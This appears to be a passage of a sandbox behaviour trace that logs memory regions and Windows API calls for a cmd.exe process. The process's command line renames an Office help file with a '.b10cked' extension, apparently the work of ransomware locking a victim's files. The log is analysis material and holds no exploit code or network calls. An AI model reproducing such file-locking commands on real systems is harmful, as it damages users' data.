= "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29273 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29274 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 29275 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29592 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29593 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29594 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29595 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 29596 start_va = 0x520000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 29597 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29598 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29599 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29600 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29601 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29602 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29603 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29604 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29605 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29646 start_va = 0x330000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 29647 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29648 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29649 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 29650 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 29651 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 29652 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 29653 start_va = 0x400000 end_va = 0x500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 29654 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 29655 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Region: id = 29684 start_va = 0x12a0000 end_va = 0x135ffff entry_point = 0x12a0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 664 os_tid = 0xc78 [0201.699] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fc14 | out: lpSystemTimeAsFileTime=0x12fc14*(dwLowDateTime=0xad077200, dwHighDateTime=0x1d440a9)) [0201.699] GetCurrentProcessId () returned 0xda4 [0201.699] GetCurrentThreadId () returned 0xc78 [0201.699] GetTickCount () returned 0x38f34 [0201.699] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc0c | out: lpPerformanceCount=0x12fc0c*=25848792766) returned 1 [0201.699] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0201.700] __set_app_type (_Type=0x1) [0201.700] __p__fmode () returned 0x76b331f4 [0201.700] __p__commode () returned 0x76b331fc [0201.700] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0201.700] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0201.700] GetCurrentThreadId () returned 0xc78 [0201.700] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc78) returned 0x38 [0201.700] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.700] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0201.700] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.715] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0201.715] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fba4 | out: phkResult=0x12fba4*=0x0) returned 0x2 [0201.715] VirtualQuery (in: lpAddress=0x12fbdb, lpBuffer=0x12fb74, dwLength=0x1c | out: lpBuffer=0x12fb74*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.715] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fb74, dwLength=0x1c | out: lpBuffer=0x12fb74*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0201.715] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fb74, dwLength=0x1c | out: lpBuffer=0x12fb74*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0201.715] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fb74, dwLength=0x1c | out: lpBuffer=0x12fb74*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.715] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fb74, dwLength=0x1c | out: lpBuffer=0x12fb74*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0201.715] GetConsoleOutputCP () returned 0x1b5 [0201.717] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.717] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0201.717] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.717] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0201.719] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.719] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.720] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.720] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.724] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.724] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.726] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.726] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0201.748] GetEnvironmentStringsW () returned 0x240190* [0201.748] FreeEnvironmentStringsW (penv=0x240190) returned 1 [0201.748] GetEnvironmentStringsW () returned 0x240190* [0201.748] FreeEnvironmentStringsW (penv=0x240190) returned 1 [0201.748] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12eb14 | out: phkResult=0x12eb14*=0x40) returned 0x0 [0201.748] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x0, lpData=0x12eb20*=0xb8, lpcbData=0x12eb18*=0x1000) returned 0x2 [0201.748] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x4, lpData=0x12eb20*=0x1, lpcbData=0x12eb18*=0x4) returned 0x0 [0201.748] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x0, lpData=0x12eb20*=0x1, lpcbData=0x12eb18*=0x1000) returned 0x2 [0201.748] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x4, lpData=0x12eb20*=0x0, lpcbData=0x12eb18*=0x4) returned 0x0 [0201.748] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x4, lpData=0x12eb20*=0x40, lpcbData=0x12eb18*=0x4) returned 0x0 [0201.748] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x4, lpData=0x12eb20*=0x40, lpcbData=0x12eb18*=0x4) returned 0x0 [0201.749] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x0, lpData=0x12eb20*=0x40, lpcbData=0x12eb18*=0x1000) returned 0x2 [0201.749] RegCloseKey (hKey=0x40) returned 0x0 [0201.749] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12eb14 | out: phkResult=0x12eb14*=0x40) returned 0x0 [0201.749] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x0, lpData=0x12eb20*=0x40, lpcbData=0x12eb18*=0x1000) returned 0x2 [0201.749] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x4, lpData=0x12eb20*=0x1, lpcbData=0x12eb18*=0x4) returned 0x0 [0201.749] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x0, lpData=0x12eb20*=0x1, lpcbData=0x12eb18*=0x1000) returned 0x2 [0201.749] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x4, lpData=0x12eb20*=0x0, lpcbData=0x12eb18*=0x4) returned 0x0 [0201.749] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x4, lpData=0x12eb20*=0x9, lpcbData=0x12eb18*=0x4) returned 0x0 [0201.749] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x4, lpData=0x12eb20*=0x9, lpcbData=0x12eb18*=0x4) returned 0x0 [0201.749] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x0, lpData=0x12eb20*=0x9, lpcbData=0x12eb18*=0x1000) returned 0x2 [0201.749] RegCloseKey (hKey=0x40) returned 0x0 [0201.749] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a3 [0201.749] srand (_Seed=0x5b8863a3) [0201.749] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.DEV.14.1033.hxn.b10cked\"" [0201.749] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.DEV.14.1033.hxn.b10cked\"" [0201.749] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.749] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2418f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0201.750] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0201.750] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0201.750] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.750] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0201.750] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0201.750] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0201.750] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0201.750] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0201.750] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0201.750] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0201.750] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0201.750] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0201.750] GetEnvironmentStringsW () returned 0x2422e0* [0201.750] FreeEnvironmentStringsW (penv=0x2422e0) returned 1 [0201.750] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.750] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.750] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0201.750] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0201.750] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0201.750] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0201.750] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0201.750] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0201.750] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0201.750] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0201.750] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f8e0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.750] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f8e0, lpFilePart=0x12f8dc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f8dc*="Desktop") returned 0x18 [0201.750] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.751] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f65c | out: lpFindFileData=0x12f65c) returned 0x240020 [0201.751] FindClose (in: hFindFile=0x240020 | out: hFindFile=0x240020) returned 1 [0201.751] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f65c | out: lpFindFileData=0x12f65c) returned 0x240020 [0201.751] FindClose (in: hFindFile=0x240020 | out: hFindFile=0x240020) returned 1 [0201.751] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f65c | out: lpFindFileData=0x12f65c) returned 0x240020 [0201.751] FindClose (in: hFindFile=0x240020 | out: hFindFile=0x240020) returned 1 [0201.751] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.751] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0201.751] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0201.751] GetEnvironmentStringsW () returned 0x242b00* [0201.751] FreeEnvironmentStringsW (penv=0x242b00) returned 1 [0201.751] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.752] GetConsoleOutputCP () returned 0x1b5 [0201.757] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.757] GetUserDefaultLCID () returned 0x409 [0201.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0201.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12fa20, cchData=128 | out: lpLCData="0") returned 2 [0201.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12fa20, cchData=128 | out: lpLCData="0") returned 2 [0201.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12fa20, cchData=128 | out: lpLCData="1") returned 2 [0201.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0201.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0201.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0201.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0201.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0201.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0201.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0201.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0201.764] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0201.764] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0201.764] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0201.765] GetConsoleTitleW (in: lpConsoleTitle=0x2308e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.781] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.781] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0201.781] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0201.782] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0201.782] _wcsicmp (_String1="move", _String2=")") returned 68 [0201.782] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0201.782] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0201.782] _wcsicmp (_String1="IF", _String2="move") returned -4 [0201.782] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0201.782] _wcsicmp (_String1="REM", _String2="move") returned 5 [0201.782] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0201.785] GetConsoleTitleW (in: lpConsoleTitle=0x12f718, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.821] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0201.821] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0201.821] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0201.821] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0201.821] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0201.821] _wcsicmp (_String1="move", _String2="CD") returned 10 [0201.821] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0201.821] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0201.821] _wcsicmp (_String1="move", _String2="REN") returned -5 [0201.821] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0201.821] _wcsicmp (_String1="move", _String2="SET") returned -6 [0201.821] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0201.821] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0201.822] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0201.822] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0201.822] _wcsicmp (_String1="move", _String2="MD") returned 11 [0201.822] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0201.822] _wcsicmp (_String1="move", _String2="RD") returned -5 [0201.822] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0201.822] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0201.822] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0201.822] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0201.822] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0201.822] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0201.822] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0201.822] _wcsicmp (_String1="move", _String2="VER") returned -9 [0201.822] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0201.822] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0201.822] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0201.822] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0201.822] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0201.822] _wcsicmp (_String1="move", _String2="START") returned -6 [0201.822] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0201.822] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0201.822] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0201.823] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.823] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.823] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f4d4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f4cc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f4cc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 